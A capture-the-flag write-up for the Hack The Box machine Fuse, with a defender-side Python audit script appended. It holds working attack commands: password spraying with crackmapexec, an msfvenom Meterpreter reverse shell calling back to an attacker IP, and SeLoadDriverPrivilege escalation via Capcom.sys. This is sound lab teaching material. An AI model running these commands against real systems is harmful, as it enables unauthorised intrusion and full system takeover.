Learn how to successfully complete the Fuse challenge on the Hack The Box platform using RPC information gathering techniques, printer data analysis, and SeLoadDriverPrivilege privilege escalation exploitation.
This series publishes solutions to machines from the HackTheBox platform.
The material describes the process of creating a password dictionary based on indirect information about users, analyzing printer data via RPC, and the method of privilege escalation using SeLoadDriverPrivilege.
The machine is assigned the IP address 10.10.10.193, which is added to the /etc/hosts file.
10.10.10.193 fuse.htb
First, we scan open ports.
#!/bin/bash
# Fast full-range port sweep, then a detailed (-A) scan of only the ports found open.
ports=$(nmap -p- --min-rate=500 "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -A "$1"
Add the FQDN of the machine name to /etc/hosts.
10.10.10.193 fuse.fabricorp.local
A web server is running on the host. Let’s see what’s there.
We are greeted by a printer site on which four documents are available for download; we download them for further analysis.
Since no other attack vectors have been identified, it is worth recording the usernames for later use.
cat *.csv | grep 2020 | cut -d ',' -f 2 | sort | uniq
We will also create a list of passwords from the information in the documents.
cat *.csv | grep 2020 | cut -d ',' -f2,5-7 | tr -d '"' | tr '.' '\n' | tr ',' '\n' | tr -d ' ' | tr '-' '\n' | sort | uniq | tail -n+4
Now it’s worth checking the ability to connect to SMB for further analysis.
cme smb 10.10.10.193 -u users.txt -p pass.txt --continue-on-success
There is a message that the password for the user needs to be changed.
We will set the same password.
smbpasswd -r 10.10.10.193 -U bhult
However, the password remains valid for only a few seconds.
Therefore, we execute two commands in a chain.
smbpasswd -r 10.10.10.193 -U bhult ; rpcclient -U bhult 10.10.10.193
We enumerate all users; we will do this over RPC.
We find an interesting user. Given the printer theme running through the whole machine, let's take a look at the printers.
We find a password. We build a list of the users confirmed valid so far.
Now let’s try the password for all users.
sudo cme smb 10.10.10.193 -u users.txt -p '$fab@s3Rv1ce$1' --continue-on-success
The password is valid for two users. We connect over WinRM and obtain the first flag.
Let’s look at the information about the current user.
The SeLoadDriverPrivilege privilege was discovered, which opens a vector for local privilege escalation (LPE). The following components are required: Capcom.sys, EoPLoadDriver, and a Meterpreter shell. The next step is to generate them.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.160 LPORT=4321 -f exe -o e.exe
Start the listener. Upload everything to the host and run the Meterpreter payload.
handler -p windows/x64/meterpreter/reverse_tcp -H 10.10.15.160 -P 4321
Now the driver needs to be loaded.
.\eoploaddriver.exe System\CurrentControlSet\custom C:\Users\svc-print\Documents\Capcom.sys
Before running the exploit, you need to make some changes to its code. You need to comment out certain lines in the file:
/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb.
We do this:
Successful execution of the exploit created a new session with SYSTEM privileges, demonstrating how SeLoadDriverPrivilege can be used to elevate privileges locally.
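As an added, defender-side example that is not part of this writeup, the following Python parses a secedit security-policy export (a constructed sample is embedded inline) and flags every SID holding SeLoadDriverPrivilege outside BUILTIN\Administrators, which is the check an administrator would run to find accounts exposed to this escalation path. The export path, the sample SIDs and the allow-list are assumptions.

```python
"""Audit a secedit policy export for holders of SeLoadDriverPrivilege.

Hypothetical defender-side helper (not from the Fuse writeup). On a host the
export would be produced with  secedit /export /cfg C:\\policy.inf /areas USER_RIGHTS
and read with open(path, encoding="utf-16"); here the text is constructed inline.
"""

# Constructed sample of the USER_RIGHTS area (not taken from the target machine).
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeRemoteInteractiveLogonRight = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Friendly names for well-known SIDs. Print Operators (S-1-5-32-550) receives
# SeLoadDriverPrivilege by default on domain controllers, which is how a print
# service account can end up with it; it is deliberately NOT in the allow-list.
WELL_KNOWN = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-550": "BUILTIN\\Print Operators",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}
ALLOWED_DRIVER_LOADERS = {"S-1-5-32-544"}  # assumption: only Administrators may load drivers


def parse_privilege_rights(export_text):
    """Return {privilege: [sid, ...]} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for raw in export_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line == "[Privilege Rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit prefixes each SID with '*' and separates them with commas
        rights[name.strip()] = [s.strip().lstrip("*") for s in value.split(",") if s.strip()]
    return rights


def unexpected_driver_loaders(export_text, allowed=ALLOWED_DRIVER_LOADERS):
    """(sid, friendly_name) pairs holding SeLoadDriverPrivilege outside the allow-list."""
    holders = parse_privilege_rights(export_text).get("SeLoadDriverPrivilege", [])
    return [(sid, WELL_KNOWN.get(sid, "<domain account or group>"))
            for sid in holders if sid not in allowed]


if __name__ == "__main__":
    for sid, name in unexpected_driver_loaders(SAMPLE_EXPORT):
        print(f"review: {name} ({sid}) can load kernel drivers")
```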
This article describes the solution to the Fuse challenge on HackTheBox. It covers printer analysis, password dictionary creation, and the use of the SeLoadDriverPrivilege privilege to gain SYSTEM-level access. It shows how such vulnerabilities can be exploited to escalate privileges.